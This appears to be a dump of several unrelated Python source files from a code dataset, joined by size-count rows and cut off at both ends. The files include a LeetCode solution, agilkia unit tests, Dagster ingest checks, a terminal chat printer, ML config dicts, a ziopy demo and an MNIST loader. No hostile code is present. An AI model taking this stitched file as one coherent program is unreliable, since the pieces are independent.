    outpath = os.path.join(args.savepath, 'test_preds.npy')
    np.save(outpath, predictions)
# Script entry point.
if __name__=='__main__':
    main()
class Solution:
    def numUniqueEmails(self, emails):
        """Count distinct delivery addresses after canonicalization.

        Dots in the local part are ignored and anything from the first
        '+' onward is dropped; the domain is kept verbatim.

        :type emails: List[str]
        :rtype: int
        """
        email_set = set()
        for email in emails:
            local, domain = email.split('@')
            local = local.replace('.', '')
            if '+' in local:
                local = local[:local.index('+')]
            # BUG FIX: keep the '@' separator — concatenating local+domain
            # lets distinct addresses collide (e.g. "ab"+"c.com" vs "a"+"bc.com").
            email_set.add(local + '@' + domain)
        return len(email_set)
# -*- coding: utf-8 -*-
"""
Unit tests for the RandomTester class.
@author: m.utting@uq.edu.au
"""
import unittest
import random
from pathlib import Path
import sklearn.utils.estimator_checks
from typing import Tuple, List, Set, Dict, Optional, Any
import agilkia
THIS_DIR = Path(__file__).parent
WSDL_EG = "http://www.soapclient.com/xml/soapresponder.wsdl"
test_input_rules = {
"username": ["User1"],
"password": ["<GOOD_PASSWORD>"] * 9 + ["bad-pass"],
"speed": [str(s) for s in range(0, 120, 10)],
"bstrParam1": ["VAL1"],
"bstrParam2": ["p2AAA", "p2BBB"],
}
class TestReadInputRules(unittest.TestCase):
    """Checks that a CSV input-rules file is parsed into per-parameter value lists."""

    def test_1(self):
        rules = agilkia.read_input_rules(THIS_DIR / "fixtures/inputs1.csv")
        self.assertEqual(rules["bstrParam1"], ["one"])
        # Repeated values encode weighted choice frequencies.
        self.assertEqual(rules["bstrParam2"], ['two', 'two', 'two', 'TWO!'])
class TestRandomTester(unittest.TestCase):
    """Tests for agilkia.RandomTester against the public soapresponder demo service.

    NOTE(review): these tests hit a live SOAP endpoint (WSDL_EG) over the
    network, so they can fail when that service is unreachable.
    """

    def setUp(self):
        # Fixed seed so input-value choices are reproducible across runs.
        self.tester = agilkia.RandomTester(
            WSDL_EG,
            input_rules=test_input_rules,
            rand=random.Random(1234))

    def test_input_user(self):
        self.assertEqual("User1", self.tester.choose_input_value("username"))

    def test_input_password(self):
        # The "<GOOD_PASSWORD>" placeholder in the rules is substituted by the tester.
        self.assertEqual(agilkia.GOOD_PASSWORD, self.tester.choose_input_value("password"))

    def test_input_speeds(self):
        # 100 draws from 12 possible speed values (0..110 step 10).
        speeds = set()
        for i in range(100):
            speeds.add(self.tester.choose_input_value("speed"))
        self.assertEqual(12, len(speeds))  # all results should be covered

    def test_signature(self):
        # The demo WSDL exposes exactly one method with two string inputs.
        sig = self.tester.get_methods()
        self.assertEqual(1, len(sig))
        self.assertEqual({"Method1"}, sig.keys())
        msig = sig["Method1"]
        self.assertEqual(1, len(msig))
        self.assertEqual({"input"}, msig.keys())
        self.assertEqual({"bstrParam1", "bstrParam2"}, msig["input"].keys())
        param1_details = "{'optional': False, 'type': 'String(value)'}"
        self.assertEqual(param1_details, str(msig["input"]["bstrParam1"]))

    def test_dummy_client_meta(self):
        """Test the dummy web service provided by soapresponder."""
        tester = agilkia.RandomTester(WSDL_EG,
                                      input_rules=test_input_rules,
                                      rand=random.Random(1234))
        # Every expected metadata key must be present on the trace set.
        meta_keys = ["date", "author", "dataset", "source",
                     "web_services", "methods_to_test", "input_rules",
                     "method_signatures"]
        mdata = tester.trace_set.meta_data
        for k in meta_keys:
            self.assertTrue(k in mdata, msg=k + " expected in meta_data")
        self.assertEqual(f"RandomTester", mdata["source"])
        self.assertEqual([WSDL_EG], mdata["web_services"])
        # check the signature
        self.assertEqual(set(["Method1"]), set(mdata["method_signatures"].keys()))
        sig = {'input': {
            'bstrParam1': {'optional': False, 'type': 'String(value)'},
            'bstrParam2': {'optional': False, 'type': 'String(value)'}}}
        self.assertEqual(sig, mdata["method_signatures"]["Method1"])

    def test_dummy_client0(self):
        """Test the dummy web service provided by soapresponder."""
        tester = agilkia.RandomTester(WSDL_EG, verbose=True,
                                      input_rules=test_input_rules,
                                      rand=random.Random(1234))
        print("Methods:", tester.get_methods())
        # With seed 1234 the first three calls pick p2AAA, the fourth p2BBB.
        out1 = tester.call_method("Method1")
        expect = {"Status": 0, "value": "Your input parameters are VAL1 and p2AAA"}
        self.assertEqual(expect, out1.outputs)
        out1 = tester.call_method("Method1")
        self.assertEqual(expect, out1.outputs)
        out1 = tester.call_method("Method1")
        self.assertEqual(expect, out1.outputs)
        out1 = tester.call_method("Method1")
        expect["value"] = "Your input parameters are VAL1 and p2BBB"
        self.assertEqual(expect, out1.outputs)
        self.assertEqual(4, len(tester.curr_events))
        self.assertEqual(1, len(tester.trace_set.traces))
        # now generate a second trace
        tester.generate_trace(start=True, length=3)
        self.assertEqual(3, len(tester.curr_events))
        self.assertEqual(2, len(tester.trace_set.traces))
        # now test saving and loading those traces.
        traceset1 = tester.trace_set
        tmp_json = Path("tmp_dummy1.json")
        traceset1.save_to_json(tmp_json)
        traceset2 = agilkia.TraceSet.load_from_json(tmp_json)
        self.assertEqual(traceset2.meta_data, traceset1.meta_data)
        self.assertEqual(len(traceset2.traces), len(traceset1.traces))
        self.assertEqual(traceset2.traces[0].events[0].action,
                         traceset1.traces[0].events[0].action)
        # Clean up the temporary file.
        tmp_json.unlink()

    def test_generate_trace(self):
        # Default trace length is 20 events.
        tr = self.tester.generate_trace()
        self.assertTrue(isinstance(tr, agilkia.Trace))
        self.assertEqual(20, len(tr.events))

    def test_decode_outputs(self):
        # Scalars are wrapped as {"Status": 0, "value": ...}; dicts get Status added.
        self.assertEqual({'Status': 0, "value": "abc"}, self.tester.decode_outputs("abc"))
        self.assertEqual({'Status': 0, "a": 2}, self.tester.decode_outputs({"a": 2}))
        # Also, zeep XML object outputs are tested in test_dummy_client0 above.
class TestTracePrefixExtractor(unittest.TestCase):
    """Tests for TracePrefixExtractor: prefixes of traces -> bag-of-words features.

    Each trace of length n yields n+1 prefixes (including the empty prefix
    and the whole trace); the label for a prefix is the next action, or
    agilkia.TRACE_END after the final event.
    """
    # Shared fixture events reused across the tests below.
    ev1 = agilkia.Event("Order", {"Name": "Mark"}, {"Status": 0})
    ev2 = agilkia.Event("Skip", {"Size": 3}, {"Status": 1, "Error": "Too big"})
    ev3 = agilkia.Event("Pay", {"Name": "Mark", "Amount": 23.45}, {"Status": 0})

    def test_bag_of_words(self):
        tr1 = agilkia.Trace([self.ev1, self.ev2])
        tr2 = agilkia.Trace([self.ev3])
        traces = agilkia.TraceSet([tr1, tr1, tr2])
        self.assertEqual(3, len(traces))
        sut = agilkia.TracePrefixExtractor()
        sut.fit(traces)
        # Default feature names are the distinct action names, sorted.
        self.assertEqual(["Order", "Pay", "Skip"], sut.get_feature_names())
        X = sut.transform(traces)
        y = sut.get_labels()
        # 3+3+2 prefixes from traces of length 2, 2, 1.
        self.assertEqual((8, 3), X.shape)
        self.assertEqual(8, len(y))
        for row in [0, 3, 6]:
            # Empty prefixes: all-zero counts, labelled with the first action.
            self.assertEqual([0.0, 0.0, 0.0], X.iloc[row, :].tolist())
            self.assertEqual("Order" if row < 6 else "Pay", y[row])
        for row in [2, 5]:
            # Full tr1 prefixes: one Order + one Skip, labelled TRACE_END.
            self.assertEqual([1.0, 0.0, 1.0], X.iloc[row, :].tolist())
            self.assertEqual(agilkia.TRACE_END, y[row])
        self.assertEqual([0.0, 1.0, 0.0], X.iloc[7, :].tolist())

    def test_bag_of_words_custom(self):
        """Test TracePrefixExtractor with a custom event-to-string function."""
        def custom(ev): return ev.inputs.get("Name", "???")
        tr1 = agilkia.Trace([self.ev1, self.ev2])
        tr2 = agilkia.Trace([self.ev3, self.ev3])
        traces = agilkia.TraceSet([tr1, tr1, tr2])
        self.assertEqual(3, len(traces))
        self.assertEqual("Mark", custom(self.ev1))
        self.assertEqual("???", custom(self.ev2))
        sut = agilkia.TracePrefixExtractor(custom)
        sut.fit(traces)
        # Features now come from the custom mapping, not the action names.
        self.assertEqual(["???", "Mark"], sut.get_feature_names())
        X = sut.transform(traces)
        y = sut.get_labels()
        self.assertEqual((9, 2), X.shape)
        self.assertEqual(9, len(y))
        for row in [0, 3, 6]:
            self.assertEqual([0.0, 0.0], X.iloc[row, :].tolist())
            self.assertEqual(custom(traces[row // 3][0]), y[row])
        for row in [2, 5]:
            self.assertEqual([1.0, 1.0], X.iloc[row, :].tolist())
            self.assertEqual(agilkia.TRACE_END, y[row])
        self.assertEqual([0.0, 2.0], X.iloc[8, :].tolist())

    def test_custom_subclass(self):
        """Test TracePrefixExtractor subclass with a custom encoder that::

         - counts Order events
         - sums all 'Size' inputs
         - reports the current action (0=Order, 1=Skip, 2=Pay)
         - and learns status output values.
        """
        action2num = {"Order": 0, "Skip": 1, "Pay": 2}

        class MyPrefixExtractor(agilkia.TracePrefixExtractor):
            def generate_feature_names(self, trace: agilkia.Trace) -> Set[str]:
                # Fixed feature set, independent of the trace contents.
                return {"Orders", "TotalSize", "CurrAction"}

            def generate_prefix_features(self, events: List[agilkia.Event],
                    current: Optional[agilkia.Event]) -> Tuple[Dict[str, float], Any]:
                total = sum([ev.inputs.get("Size", 0) for ev in events])
                orders = len([ev.action for ev in events if ev.action == "Order"])
                if current is not None:
                    action = action2num[current.action]
                    learn = current.status
                else:
                    # End of trace: sentinel action/label of -1.
                    action = -1
                    learn = -1
                return {"Orders": orders, "TotalSize": total, "CurrAction": action}, learn
        tr1 = agilkia.Trace([self.ev1, self.ev2, self.ev2, self.ev1])
        tr2 = agilkia.Trace([self.ev3, self.ev3])
        traces = agilkia.TraceSet([tr1, tr2])
        # now run the encoder
        sut = MyPrefixExtractor()
        sut.fit(traces)
        # Feature names are reported sorted alphabetically.
        self.assertEqual(["CurrAction", "Orders", "TotalSize"], sut.get_feature_names())
        X = sut.transform(traces)
        y = sut.get_labels()
        self.assertEqual((8, 3), X.shape)
        self.assertEqual(8, len(y))
        # tr1 prefixes
        self.assertEqual([0, 0, 0], X.iloc[0, :].tolist())
        self.assertEqual([1, 1, 0], X.iloc[1, :].tolist())
        self.assertEqual([1, 1, 3], X.iloc[2, :].tolist())
        self.assertEqual([0, 1, 6], X.iloc[3, :].tolist())
        self.assertEqual([-1, 2, 6], X.iloc[4, :].tolist())
        self.assertEqual([0, 1, 1, 0, -1], y[0:5])
        # tr2 prefixes
        self.assertEqual([2, 0, 0], X.iloc[5, :].tolist())
        self.assertEqual([2, 0, 0], X.iloc[6, :].tolist())
        self.assertEqual([-1, 0, 0], X.iloc[7, :].tolist())
        self.assertEqual([0, 0, -1], y[5:])
| 9,926 | 3,436 |
# extract the Salamunnicar data from the XLS file
import pandas as pd
import pkg_resources
import logging
import os
def extract_salamuniccar(filename, tables=None,
                         output_prefix=None,
                         output_filename=None):
    """Extract the lat,long, diameter from the Salamuniccar catalogs.

    filename: path to the Salamuniccar XLS workbook.
    tables: sheet name(s) to process; defaults to every sheet except the
        "YourCatalogue" and "Macros" bookkeeping sheets.
    output_prefix: prefix for the per-sheet raw HDF dumps (default "GS_").
    output_filename: when given, the renamed/cleaned columns are also
        appended to this single HDF file, one key per sheet.
    """
    logger = logging.getLogger(__name__)
    logging.basicConfig(level=logging.INFO)
    logger.info("Reading Excel file")
    logger.info(output_filename)
    dfe = pd.ExcelFile(filename)
    names = [x for x in dfe.sheet_names if
             x != "YourCatalogue" and x != "Macros"]
    tables = tables or names
    if isinstance(tables, str):
        tables = [tables]
    output_prefix = output_prefix or "GS_"
    # Column-name mapping shipped with the package.
    mapping_name = pkg_resources.resource_filename('cratertools',
                                                   'data/salamuniccar_mapping.csv',)
    mapping = pd.read_csv(mapping_name, index_col=0)
    for name in tables:
        logger.info("Processing table : {}".format(name))
        df = pd.read_excel(filename, name)
        outname = output_prefix + name
        df.to_hdf(outname, "/" + name)
        if output_filename is None:
            continue
        # Was a bare print(); route through the logger like everything else.
        logger.info("%s %s", name, mapping.index)
        if name in mapping.index:
            d = mapping[mapping.index == name]
            v, k = d.columns.values, d.values[0]
            df = df.loc[:, k]
            df.rename(columns=dict(zip(k, v)),
                      inplace=True)
            # BUG FIX: wrap longitudes > 180 into (-180, 180] with .loc —
            # the chained assignment df["Long"][mask] -= 360 can silently
            # operate on a copy (SettingWithCopyWarning).
            df.loc[df["Long"] > 180, "Long"] -= 360
            df = df.dropna()
            df.to_hdf(output_filename, name,
                      append=os.path.exists(output_filename), complevel=5)
def extract_robbins(filename, output_filename=None):
    """Extract the lat,long, diameter from the robbins catalog."""
    logger = logging.getLogger(__name__)
    logging.basicConfig(level=logging.INFO)
    logger.info("Reading Robbins data")
    catalog = pd.read_table(filename, engine="python", delimiter="\t")
    # Column-name mapping shipped with the package; the "Robbins" row
    # maps raw catalog columns to canonical names.
    mapping_path = pkg_resources.resource_filename('cratertools',
                                                   'data/salamuniccar_mapping.csv',)
    mapping = pd.read_csv(mapping_path, index_col=0)
    row = mapping[mapping.index == "Robbins"]
    new_cols, old_cols = row.columns.values, row.values[0]
    catalog = catalog[old_cols]
    catalog.rename(columns=dict(zip(old_cols, new_cols)), inplace=True)
    if output_filename is not None:
        catalog.to_hdf(output_filename, "/Robbins",
                       append=os.path.exists(output_filename), index=False)
| 2,576 | 787 |
from ARLO.environment.environment import * | 42 | 11 |
from typing import Optional
from dagster import solid, Int, Failure, Nothing, configured, String, DagsterLogManager
from dagster.core.execution.context.compute import AbstractComputeExecutionContext
from dagster_utils.typing import DagsterConfigDict
from data_repo_client import JobModel, ApiException, RepositoryApi
from hca_manage.common import JobId
from hca_orchestration.contrib.retry import is_truthy, retry
class DataFileIngestionFailure(Failure):
    """Dagster Failure raised when a bulk file-ingest job reports failed files."""
    pass
@solid(
    required_resource_keys={"data_repo_client"},
    config_schema={
        'max_wait_time_seconds': Int,
        'poll_interval_seconds': Int,
    }
)
def base_check_data_ingest_job_result(context: AbstractComputeExecutionContext, job_id: JobId) -> JobId:
    """Poll a TDR bulk file-ingest job until results are available.

    Raises DataFileIngestionFailure if the job reports any failed files;
    otherwise returns job_id unchanged so downstream solids can chain on it.
    """
    job_results = _base_check_jade_job_result(
        context.solid_config['max_wait_time_seconds'],
        context.solid_config['poll_interval_seconds'],
        job_id,
        context.resources.data_repo_client,
        context.log
    )
    # Any failed file fails the whole pipeline.
    if job_results['failedFiles'] > 0:
        raise DataFileIngestionFailure(
            f"Bulk file load (job_id = {job_id} had failedFiles = {job_results['failedFiles']})")
    return job_id
@configured(base_check_data_ingest_job_result)
def check_data_ingest_job_result(config: DagsterConfigDict) -> DagsterConfigDict:
    """
    Polls the bulk file ingest results.
    Any files failed will fail the pipeline.
    """
    # Pre-baked polling config for the base solid above.
    return {
        'max_wait_time_seconds': 28800,  # 8 hours
        'poll_interval_seconds': 5
    }
@solid(
    required_resource_keys={"data_repo_client"},
    config_schema={
        'max_wait_time_seconds': Int,
        'poll_interval_seconds': Int,
    }
)
def check_table_ingest_result(context: AbstractComputeExecutionContext, job_id: JobId) -> JobId:
    """Poll a TDR table-ingest job; fail the pipeline if any rows were bad.

    Returns job_id unchanged so downstream solids can chain on it.
    """
    job_results = _base_check_jade_job_result(
        context.solid_config['max_wait_time_seconds'],
        context.solid_config['poll_interval_seconds'],
        job_id,
        context.resources.data_repo_client,
        context.log
    )
    # BUG FIX: the original raised when bad_row_count == '0' (i.e. on
    # success) and formatted a nonexistent 'failedFiles' key in the message.
    if job_results['bad_row_count'] != '0':
        raise Failure(
            f"Table ingest (job_id = {job_id}) had bad_row_count = {job_results['bad_row_count']}")
    return job_id
@configured(check_table_ingest_result)
def check_table_ingest_job_result(config: DagsterConfigDict) -> DagsterConfigDict:
    """
    Polls the table ingest results.
    Any bad rows will fail the pipeline.
    """
    # Pre-baked polling config for check_table_ingest_result above.
    return {
        'max_wait_time_seconds': 600,  # 10 minutes
        'poll_interval_seconds': 5,
    }
def _base_check_jade_job_result(
    max_wait_time_seconds: int,
    poll_interval_seconds: int,
    job_id: JobId,
    data_repo_client: RepositoryApi,
    logger: DagsterLogManager
) -> JobModel:
    """Poll the data repo for a job's results until available or timed out.

    Retries on 5xx responses (treated as transient); any other ApiException
    propagates.  Raises Failure if no results arrive within
    max_wait_time_seconds.  Returns the job results.
    (Annotation fixed: the function returns the results, not Nothing.)
    """
    # we need to poll on the endpoint as a workaround for a race condition in TDR (DR-1791)
    def __fetch_job_results(jid: JobId) -> Optional[JobModel]:
        try:
            logger.info(f"Fetching job results for job_id = {jid}")
            return data_repo_client.retrieve_job_result(jid)
        except ApiException as ae:
            # 5xx is transient: return None so retry() schedules another attempt.
            if 500 <= ae.status <= 599:
                logger.info(f"Data repo returned error when fetching results for job_id = {jid}, scheduling retry")
                return None
            raise

    job_results = retry(
        __fetch_job_results,
        max_wait_time_seconds,
        poll_interval_seconds,
        is_truthy,
        job_id
    )
    if not job_results:
        raise Failure(f"No job results after polling bulk ingest, job_id = {job_id}")
    return job_results
| 3,558 | 1,141 |
#
# Author: Igor Ivanov
# 2019
#
import time
import os
from termcolor import colored
from datetime import datetime
import colorama
colorama.init()
"""
Small print tool for implementing chat in the terminal
"""
class print_chat:
    """Render a chat conversation in the terminal using ANSI cursor moves.

    Messages live in self.MESSAGES (oldest first).  Message *numbers* in
    the public API count from the end: 1 is the most recent message.
    Each message is a dict: sender, text, time, skip (extra lines printed
    below it), mark (short tags appended after the text).
    """

    def _clear_screen(self):
        os.system('cls' if os.name == 'nt' else 'clear')

    def clear_row(self):
        # Overwrite the current row with spaces and return to column 0.
        print('\r' + ' ' * os.get_terminal_size().columns + '\r', end='')

    def up_on_rows(self, number):
        # BUG FIX: was `self.clear_row` without parentheses (a no-op).
        self.clear_row()
        print(('\x1b[A\r' + ' ' * os.get_terminal_size().columns + '\r') * number, end='')

    def up_on_message(self, number):
        # Move the cursor up to the start of message *number* from the end.
        n = self.__get_lines(number)
        self.up_on_rows(n)

    def up_on_occupied_rows(self, len_str):
        lines = ((len_str - 1) // os.get_terminal_size().columns) + 1
        self.up_on_rows(lines)

    def down_on_rows(self, number):
        self.clear_row()
        print(('\n\r' + ' ' * os.get_terminal_size().columns + '\r') * number, end='')

    def get_num_messages(self):
        return len(self.MESSAGES)

    def get_messages_from(self, sender):
        # BUG FIX: the accumulator was a tuple, and tuples have no .append().
        return [m for m in self.MESSAGES if m['sender'] == sender]

    def get_messages(self):
        return self.MESSAGES

    def get_message(self, number):
        # Returns None for out-of-range numbers (original behavior).
        if number <= len(self.MESSAGES):
            return self.MESSAGES[len(self.MESSAGES) - number]

    def get_senders(self):
        # BUG FIX: originally iterated self.senders.keys() on a *list* of
        # dicts (AttributeError) and appended to a tuple.
        return [entry['sender'] for entry in self.senders]

    def set_colors(self, colors):
        """colors: iterable of (sender, color) pairs; (sender,) gets 'grey'."""
        for color in colors:
            # BUG FIX: `found` was initialised once outside the loop, so
            # after any match no later unmatched sender could be added.
            found = False
            for entry in self.senders:
                if entry['sender'] == color[0]:
                    entry['color'] = color[1]
                    found = True
            if not found:
                if len(color) == 1:
                    self.senders.append({
                        'sender': color[0],
                        'color': 'grey',
                    })
                else:
                    self.senders.append({
                        'sender': color[0],
                        'color': color[1],
                    })

    def get_time(self):
        # Timestamp format depends on the `time` mode chosen at construction.
        if not self.time_full:
            return datetime.today().strftime("%H:%M")
        return datetime.today().strftime("%d.%m.%y %H:%M")

    def set_header(self, text):
        self.header = text.split('\n')
        self._print_header()

    def _print_header(self):
        self._clear_screen()
        for line in self.header:
            print(line)

    # returns the number of lines that must be passed to move the cursor
    # to the specified message
    def __get_lines(self, number):
        lines = 0
        cols = os.get_terminal_size().columns
        for i in range(number):
            # counting the number of lines occupied by a message
            m = self.MESSAGES[(len(self.MESSAGES) - 1) - i]
            # NOTE(review): len(m['mark']) counts marks, not their
            # characters — preserved from the original; confirm intent.
            l = len(m['sender']) + len(m['text']) + len(m['mark']) + self.len_frame
            # count the number of lines occupied by a skip
            s = 0
            for j in m['skip']:
                # Everything is stringified, so only the str branch of the
                # original isinstance check was ever reachable.
                for part in str(j).split('\n'):
                    s += ((len(part) - 1) // cols) + 1
            lines += (((l - 1) // cols) + 1) + s
        return lines

    def _print_mess(self, sender, text, time, skip, mark):
        if self.is_time:
            print('[{}] '.format(time), end='')
        # color selection for printing sender name
        c0, c1 = 'white', 'grey'
        found = False
        for entry in self.senders:
            if entry['sender'] == sender:
                c = entry['color']
                if c == 'grey':
                    c0, c1 = 'white', 'grey'
                else:
                    c0, c1 = 'grey', c
                # BUG FIX: `found = True` was placed after `break` (dead
                # code), so known senders were re-registered every message.
                found = True
                break
        if not found:
            self.senders.append({
                'sender': sender,
                'color': 'grey',
            })
        print(colored('[' + sender + ']', c0, ('on_' + c1)) + ': ', end='')
        print('{}{}'.format(text, ''.join(mark)), end='\n')
        for line in skip:
            print(line)

    def add_mark(self, number, mark):
        if mark != '' and 0 < number <= len(self.MESSAGES):
            self.up_on_message(number)
            # Appending covers both the empty and non-empty cases the
            # original handled separately.
            self.MESSAGES[len(self.MESSAGES) - number]['mark'].append(str(mark))
            self._load(number)

    def edit_mark(self, number, mark):
        if 0 < number <= len(self.MESSAGES):
            if mark == '':
                self.remove_mark(number)
            else:
                n = len(self.MESSAGES) - number
                self.up_on_message(number)
                self.MESSAGES[n]['mark'] = [str(mark)]
                self._load(number)

    def remove_mark(self, number):
        if 0 < number <= len(self.MESSAGES):
            n = len(self.MESSAGES) - number
            self.up_on_message(number)
            self.MESSAGES[n]['mark'] = []
            self._load(number)

    def has_mark(self, number):
        return self.MESSAGES[len(self.MESSAGES) - number]['mark'] != []

    def get_mark(self, number):
        # NOTE: the original defined get_mark twice with identical
        # behavior; the duplicate has been removed.
        return self.MESSAGES[len(self.MESSAGES) - number]['mark']

    def add_skip(self, number, text):
        if text != '' and 0 < number <= len(self.MESSAGES):
            self.up_on_message(number)
            self.MESSAGES[len(self.MESSAGES) - number]['skip'].append(str(text))
            self._load(number)

    def edit_skip(self, number, text):
        if 0 < number <= len(self.MESSAGES):
            if text == '':
                self.remove_skip(number)
            else:
                self.up_on_message(number)
                self.MESSAGES[len(self.MESSAGES) - number]['skip'] = [str(text)]
                self._load(number)

    def remove_skip(self, number):
        if 0 < number <= len(self.MESSAGES):
            self.up_on_message(number)
            self.MESSAGES[len(self.MESSAGES) - number]['skip'] = []
            self._load(number)

    def has_skip(self, number):
        return self.MESSAGES[len(self.MESSAGES) - number]['skip'] != []

    # reprints the specified number of messages
    def reload(self, number):
        if 0 < number < len(self.MESSAGES):
            self.up_on_message(number)
            self._load(number)
        elif number == len(self.MESSAGES):
            # Reloading everything: redraw header too.
            self._clear_screen()
            self._print_header()
            self._load(number)

    def _load(self, number):
        # Re-print the last *number* messages in order.
        if 0 < number <= len(self.MESSAGES):
            for m in self.MESSAGES[len(self.MESSAGES) - number:]:
                self._print_mess(m['sender'], m['text'], m['time'], m['skip'], m['mark'])

    def remove(self, number):
        if 0 < number <= len(self.MESSAGES):
            self.up_on_message(number)
            self._load(number - 1)
            self.MESSAGES.pop(len(self.MESSAGES) - number)

    def edit(self, number, text):
        if 0 < number <= len(self.MESSAGES):
            if text == '':
                self.remove(number)
            else:
                n = len(self.MESSAGES) - number
                self.up_on_message(number)
                self.MESSAGES[n]['text'] = text
                self._load(number)

    def add_message_top(self, sender, text, time='', skip=None, mark=None, prnt=True):
        # BUG FIX: skip/mark were mutable default arguments ([]), shared
        # between every message added without explicit lists.
        skip = [] if skip is None else skip
        mark = [] if mark is None else mark
        text = " ".join(str(text).split())
        if text != '':
            if time == '':
                time = self.get_time()
            self.MESSAGES.insert(0, {
                'sender': sender,
                'text': text,
                'time': time,
                'skip': skip,
                'mark': mark,
            })
            if prnt:
                # Redraw: move above the existing messages, print the new
                # top message, then reprint the rest.
                self.up_on_message(self.get_num_messages() - 1)
                self._print_mess(sender, text, time, skip, mark)
                self._load(self.get_num_messages() - 1)

    def add_message(self, sender, text, time='', skip=None, mark=None):
        # BUG FIX: same mutable-default-argument fix as add_message_top.
        skip = [] if skip is None else skip
        mark = [] if mark is None else mark
        text = " ".join(str(text).split())
        if text != '':
            if time == '':
                time = self.get_time()
            self.MESSAGES.append({
                'sender': sender,
                'text': text,
                'time': time,
                'skip': skip,
                'mark': mark,
            })
            self._print_mess(sender, text, time, skip, mark)

    def close(self, clr=False):
        self.MESSAGES.clear()
        self.senders.clear()
        print('\x1b[A\r', end='')
        if clr:
            self._clear_screen()

    def __init__(self, time=False):
        """time: False (no timestamps), 'short' ([HH:MM]) or 'full' ([dd.mm.yy HH:MM])."""
        self.MESSAGES = []
        self.senders = []
        self.header = []
        self.is_time = False
        self.time_full = False
        # len_frame = fixed characters around a message line: brackets,
        # ': ' separator, plus the timestamp frame when enabled.
        if time == 'short':
            self.len_frame = 4 + 8
            self.is_time = True
        elif time == 'full':
            self.len_frame = 4 + 8 + 9
            self.is_time = True
            self.time_full = True
        else:
            self.len_frame = 4
        self._clear_screen()
| 10,533 | 3,237 |
"""
This class is used by test_pageobjects
"""
from cumulusci.robotframework.pageobjects import ListingPage, pageobject
# The point of this class is to test out using an alias
@pageobject(page_type="Listing", object_name="Custom Object")
class CustomObjectListingPage(ListingPage):
    # Registered under the alias "Custom Object" while pointing at the
    # real API name below — exercises page-object alias resolution.
    _object_name = "CustomObject__c"
| 321 | 95 |
# Hyperparameters for a logistic-regression model.
logreg_params = {
    'multi_class': 'ovr',
    'class_weight': None,
    'random_state': 43,
    'max_iter': 300,
    'n_jobs': -1,       # use all available cores
    'penalty': 'l2',
    'C': 0.5,           # inverse regularization strength
}
# Configuration for the character-level RNN experiment.
rnn_params = {
    # Data paths
    "df": "../coleridgeinitiative-show-us-the-data/train_splitted.csv",
    "vectorizer_file": "vectorizer.json",
    "model_state_file": "model.pth",
    "save_dir": "../models",
    # Network architecture hyperparameters
    "char_embedding_size": 64,
    "rnn_hidden_size": 16,
    # Training hyperparameters
    "num_epochs": 300,
    "learning_rate": 1e-2,
    "batch_size": 32,
    "seed": 1337,
    "early_stopping_criteria": 5,
    # Runtime hyperparameters
    "cuda": True,
    "catch_keyboard_interrupt": True,
    "reload_from_files": False,
    "expand_filepaths_to_save_dir": True,
}
from typing import NoReturn, Union
import ziopy.services.console as console
import ziopy.services.system as system
from ziopy.environments import ConsoleSystemEnvironment
from ziopy.services.console import Console, LiveConsole
from ziopy.zio import ZIO, ZIOMonad, monadic, unsafe_run, Environment
@monadic
def program(
    do: ZIOMonad[Console, Union[EOFError, KeyboardInterrupt]]
) -> ZIO[
    Console,
    Union[EOFError, KeyboardInterrupt],
    str
]:
    """Demo ZIO program: asks for a name, counts x up to 20, returns a greeting.

    Each ``do <<`` unwraps one ZIO effect inside the monadic context; the
    function itself only *describes* the effect — nothing runs until the
    returned ZIO value is executed (e.g. via unsafe_run).
    """
    # Pull the Console service out of the provided environment.
    con = do << Environment()
    do << con.print("Hello, what is your name?")
    name = do << con.input()
    do << con.print(f"Your name is: {name}")
    x = do << ZIO.succeed(1)
    while x < 20:
        # map(+1), then flat_map(-1), then flat_map(+1): net effect is x + 1
        # per iteration — the chain just demonstrates map/flat_map composition.
        x = do << (
            ZIO.succeed(x)
            .map(lambda p: p + 1)
            .flat_map(lambda q: ZIO.succeed(q - 1))
            .flat_map(lambda r: ZIO.succeed(r + 1))
        )
        do << con.print(f"The value of x is: {x}")
    return ZIO.succeed(f"Hello, {name}!")
# Supply the live console to get a runnable effect, then execute it.
# A ZIO program is a plain value, so the very same object can be run
# any number of times.
runnable = program().provide(LiveConsole())
first_run = unsafe_run(runnable)
print(f"Final result (1) is: {first_run}")
second_run = unsafe_run(runnable)
print(f"Final result (2) is: {second_run}")
@monadic
def prog(
    do: ZIOMonad[ConsoleSystemEnvironment, NoReturn]
) -> ZIO[ConsoleSystemEnvironment, NoReturn, int]:
    """Ask the user's age on the console, echo it back, and return it.

    Falls back to default_value when the input cannot be parsed.
    """
    age = do << console.get_input_from_console(
        prompt="How old are you?\n",
        # str -> int parser; ValueError is captured into an Either
        # instead of propagating, so bad input selects the default.
        parse_value=ZIO.from_callable(str).map(int).catch(ValueError).either().to_callable(),
        default_value=21
    )
    do << console.print(f"You are {age} years old.")
    return ZIO.succeed(age)
# Wire up the live console + system services and execute `prog`.
live_env = ConsoleSystemEnvironment(console=LiveConsole(), system=system.LiveSystem())
unsafe_run(prog().provide(live_env))
| 1,741 | 610 |
import os
import struct
import unittest
import numpy as np
#
# based on https://gist.github.com/akesling/5358964
# which contains the comment:
# > Loosely inspired by http://abel.ee.ucla.edu/cvxopt/_downloads/mnist.py
# > which is GPL licensed.
#
class MNistLoader:
    """Reader for the MNIST dataset in its original IDX binary format."""

    # Expected big-endian IDX magic numbers.
    _LABEL_MAGIC = 2049   # idx1-ubyte (label files)
    _IMAGE_MAGIC = 2051   # idx3-ubyte (image files)

    @classmethod
    def read_mnist(cls,
                   training=True,
                   path="."):
        """Load MNIST images and labels from *path*.

        Args:
            training: When True read the training split, otherwise the
                t10k test split.
            path: Directory containing the ``*.idx?-ubyte`` files.

        Returns:
            Tuple ``(img, lbl)``: ``img`` is a uint8 array of shape
            (N, rows, cols); ``lbl`` is a uint8 array of shape (N,).

        Raises:
            ValueError: If a file's magic number is wrong, or the image
                and label counts disagree.
        """
        if training:
            fname_img = os.path.join(path, 'train-images.idx3-ubyte')
            fname_lbl = os.path.join(path, 'train-labels.idx1-ubyte')
        else:
            fname_img = os.path.join(path, 't10k-images.idx3-ubyte')
            fname_lbl = os.path.join(path, 't10k-labels.idx1-ubyte')
        # Load everything in some numpy arrays, validating the IDX headers
        # (the original discarded the magic/count fields unchecked and read
        # labels as int8, though the format stores unsigned bytes).
        with open(fname_lbl, 'rb') as flbl:
            magic, num_lbl = struct.unpack(">II", flbl.read(8))
            if magic != cls._LABEL_MAGIC:
                raise ValueError(f"Bad label-file magic {magic} in {fname_lbl}")
            lbl = np.fromfile(flbl, dtype=np.uint8)
